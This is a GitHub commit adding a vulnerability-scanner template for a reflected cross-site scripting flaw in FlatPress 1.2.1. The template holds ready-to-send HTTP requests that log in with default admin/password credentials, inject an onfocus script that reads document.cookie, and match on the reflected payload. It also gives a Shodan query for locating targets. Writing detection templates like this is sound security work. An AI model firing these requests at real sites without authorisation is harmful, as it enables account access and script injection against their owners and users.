Create flatpress-xss.yaml

patch-1
Arafat Ansari 2022-10-13 16:11:15 +05:30 committed by GitHub
parent 67f1a0c997
commit ed83463ff3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 53 additions and 0 deletions

View File

@ -0,0 +1,53 @@
id: flatpress-xss
info:
name: FlatPress 1.2.1 - Cross-site scripting (XSS)
author: arafatansari
severity: medium
description: |
A Reflected cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.
reference:
- https://github.com/flatpressblog/flatpress/issues/153
metadata:
shodan-query: http.html:"Flatpress"
verified: "true"
tags: xss,cve,2021
requests:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp
------WebKitFormBoundarykGJmx9vKsePrMkVp
Content-Disposition: form-data; name="user"
admin
------WebKitFormBoundarykGJmx9vKsePrMkVp
Content-Disposition: form-data; name="pass"
password
------WebKitFormBoundarykGJmx9vKsePrMkVp
Content-Disposition: form-data; name="submit"
Login
------WebKitFormBoundarykGJmx9vKsePrMkVp--
- |
GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.cookie%29%22autofocus%3d%22 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "alert(document.cookie)"
condition: and